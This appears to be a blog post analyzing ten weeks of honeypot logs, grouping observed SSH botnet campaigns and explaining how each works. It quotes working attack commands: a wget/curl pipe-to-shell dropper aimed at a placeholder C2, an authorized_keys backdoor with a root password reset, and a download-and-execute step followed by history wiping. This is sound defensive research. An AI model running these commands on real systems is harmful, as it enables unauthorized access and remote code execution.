2026-05-13 11:00pm
Ten weeks into running the honeypot and things have gotten more interesting. The previous post covered the redtail cryptominer - this one covers what else showed up, and some evolution of redtail itself.
The same automated dropper (I'll call it RedtailBot) has not stopped. It has been hitting the honeypot every few hours since early March, and as of today is still going. The interesting part is watching its C2 server rotate - I'm just calling them C2-A through C2-F:
| Period | C2 |
|---|---|
| March 2 - March 4 | C2-A |
| March 5 - April 4 | C2-B |
| April 5 - April 27 | C2-C |
| April 21 - April 28 | C2-D (overlap with C2-C) |
| April 28 - April 30 | C2-E |
| May 1 - May 13 | C2-F |
Every session from RedtailBot is the same one-liner:
uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://[C2]/sh || curl -sk https://[C2]/sh) | sh -s ssh
The hex in there decodes to auth_ok - so the bot is echoing a confirmation string back to whatever is listening. Since the honeypot has sh removed/broken, every attempt fails at the pipe stage with -bash: sh: command not found. It just keeps trying anyway.
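You can verify the decode yourself - it's just an escaped byte string, with the trailing \x0A being an explicit newline:

```
$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
auth_ok
```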
At roughly 3-4 hits per day across 10+ weeks, that works out to somewhere around 250-300 failed infection attempts from this one bot alone.
Starting March 24 and still showing up as late as May 1, a different campaign has been hitting the honeypot with a very manual-feeling sequence. I'll call the operator MdrfckrCrew after the comment in their SSH key:
cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">> .ssh/authorized_keys && chmod -R go= ~/.ssh
echo "root:[randompassword]"|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
After establishing the backdoor it does a fairly thorough system survey - CPU model, RAM, disk, number of CPU cores, uptime, w, uname -m. Classic "is this machine worth keeping?" reconnaissance.
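The exact commands varied slightly between sessions, but the survey amounts to roughly this (my reconstruction of the pattern, not a verbatim log):

```
grep -m1 "model name" /proc/cpuinfo   # CPU model
nproc                                 # core count
free -m                               # RAM
df -h                                 # disk
uptime                                # uptime and load
w                                     # anyone else logged in?
uname -m                              # architecture
```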
The same SSH public key with the mdrfckr comment shows up from three source IPs in three different countries over about six weeks, which suggests a coordinated botnet with a shared key that gets dropped onto every new box. The password set via chpasswd is different each time (e.g. m9Nj0SJj1Qjj, 1WODHU9OOXSH, hg28pZIb3Kbg), probably generated per-session.
The lockr command (alongside chattr) is worth noting - it's trying multiple anti-immutable-flag tools in case one isn't available. chattr is the standard Linux one but lockr isn't a standard tool - so either it's a custom binary or they're just throwing both at the wall.
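For reference, here's the mechanism being attacked - defenders sometimes pin authorized_keys down with the immutable flag, and stripping it is exactly what the chattr -ia step is for:

```
chattr +i ~/.ssh/authorized_keys    # defender: immutable, no writes even as root
lsattr  ~/.ssh/authorized_keys      # the i shows up in the flags column
chattr -ia ~/.ssh/authorized_keys   # attacker: strip immutable (i) and
                                    # append-only (a) before rewriting the key
```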
In early April, several sessions I'll group as SysMonitorCrew started running a fingerprinting sequence, followed by an attempt to download something to ~/.sysmonitor from a C2 I'll call SM-C2:
uname -s -v -n -r -m
nproc
uptime -p | awk '...'
awk -F: '/model name|Processor/ {gsub(/^ +/, "", $2); print $2; exit}' /proc/cpuinfo
curl -s https://ipinfo.io/org || wget -qO- https://ipinfo.io/org || ...
nvidia-smi -q | grep "Product Name" ...
nvidia-smi -q | grep "Attached GPUs" ...
curl -sSL http://[SM-C2]/[token] -o ~/.sysmonitor || wget -qO ~/.sysmonitor http://[SM-C2]/[token] || ...
chmod +x ~/.sysmonitor && ~/.sysmonitor && history -c && history -w
A few things stand out here. First, the nvidia-smi calls - this campaign is specifically GPU hunting. It checks both Product Name and Attached GPUs counts, so it's doing a proper survey before deciding what to drop. Second, the ISP lookup via ipinfo.io/org - probably filtering out residential connections or cloud providers it already has coverage on. Third, the history -c && history -w at the end to wipe bash history after running.
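The payload itself hasn't been analyzed yet (more on that below), but the probe sequence implies a gate along these lines - a hypothetical sketch, where the variable names and the branch logic are mine, not recovered from the campaign:

```
# Hypothetical reconstruction of the dropper's decision logic:
GPUS=$(nvidia-smi -q 2>/dev/null | grep "Attached GPUs" | awk '{print $NF}')
ORG=$(curl -s https://ipinfo.io/org)   # e.g. "AS15169 Google LLC"
if [ "${GPUS:-0}" -ge 1 ]; then
    echo "GPU present ($ORG) - worth dropping the GPU payload"
fi
```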
The binary URL has a long random-looking token path which is probably just obscurity rather than real security - but it does mean you can't accidentally stumble on it. The honeypot doesn't make outbound connections in real time, but URLs seen in sessions get queued and fetched separately at random intervals post-session - so the binary may already be sitting in storage, just not analyzed yet. Given the GPU focus, GPU-accelerated mining (or possibly a cryptostealer that targets GPU memory) seems the likely payload.
The same SM-C2 shows up across three different sessions from different source IPs on April 3-4, suggesting a coordinated campaign.
Starting April 17, a persistent source I'll call ContainerProber began hammering the honeypot with the same command over and over:
echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
This ran for weeks - multiple times per day up through early May. What's interesting about this one is what it's actually checking for. Reading /proc/1/mounts and listing /proc/1/ is a standard container escape detection technique - if you're inside a Docker container, PID 1 won't be systemd and /proc/1/mounts will show overlay filesystems. The curl2 in there is probably a typo or a test binary it's looking for.
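On a stock host versus a default Docker container, those two reads give the game away immediately:

```
cat /proc/1/comm             # host: "systemd" (or "init")
                             # container: the entrypoint process
grep overlay /proc/1/mounts  # container: "overlay / overlay rw,..." -
                             # the root filesystem is an overlay mount
```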
Starting in May, a cluster of Tor exit nodes started running a similar but slightly different variant:
echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778084668565428669" | sh
The big number at the end changes every session - it looks like a session/tracking ID embedded in the payload. These are almost certainly separate operators from ContainerProber, but the same underlying goal: find containers with misconfigured host mounts or namespace leaks.
My honeypot exposes a fake /proc with limited entries, which is apparently convincing enough that they keep coming back.
Three separate sessions (I'll call them ELFProbe) hit the honeypot with a very simple probe:
echo 1 && cat /bin/echo
The output on a real Linux system starts with the ELF magic bytes \x7fELF\x02\x01\x01 - so they're checking the magic to confirm they're actually on a Linux system and not some kind of fake/emulated environment. The honeypot faithfully serves back 1\n\x7fELF\x02\x01\x01\x00 and they seem satisfied with that.
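On a real x86-64 box the check looks like this:

```
$ head -c 6 /bin/echo | od -An -tx1
 7f 45 4c 46 02 01
$ # \x7f 'E' 'L' 'F', then 0x02 = 64-bit class, 0x01 = little-endian
```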
One session also did:
echo 1 > /dev/null && cat /bin/echo
Which is basically the same thing, but also checks that /dev/null behaves correctly. Shell capability probing seems to be getting more thorough over time.
One session I'll call MegaScan ran the most comprehensive single-command fingerprint I've seen so far, all in one shot:
cat /proc/cpuinfo; echo ___SEP___; echo $((1337+1337)); echo ___SEP___; mount; echo ___SEP___; uname -a; echo ___SEP___; ls -la /; echo ___SEP___; whoami; echo ___SEP___; cat /etc/issue; echo ___SEP___; ps -ef; echo ___SEP___; free -m; echo ___SEP___; hostname
The $((1337+1337)) is a shell arithmetic test: if it outputs 2674, the shell is functional; if it outputs the literal string $((1337+1337)), it's a dumb shell or a fake environment. The session lasted nearly 19 hours - the connection was held open the whole time, probably waiting on a result that never came back to whoever was watching.
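The difference is easy to demonstrate - a real shell evaluates the arithmetic expansion before echo even runs, while a naive command-matcher hands the token back literally:

```
$ echo $((1337+1337))      # real POSIX shell
2674
$ echo $((1337+1337))      # dumb emulator, no arithmetic expansion
$((1337+1337))
```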
After ten weeks, the pattern is roughly: this honeypot IP gets picked up by mass scanners within hours, and then sits on multiple different botnet target lists simultaneously. The traffic breaks down into a few categories:

- cryptominer droppers on a fixed schedule (RedtailBot)
- SSH-key backdoor botnets with "is this box worth keeping?" surveys (MdrfckrCrew)
- hardware-specific hunting, notably for GPUs (SysMonitorCrew)
- container escape probing (ContainerProber and the Tor-exit variant)
- environment fingerprinting to weed out fakes (ELFProbe, MegaScan)
The infrastructure this thing is sitting on has a hostname that looks like a legitimate mail server, which seems to be enough misdirection that at least some automated tools don't immediately filter it out.
Still watching. Will post again if anything interesting evolves.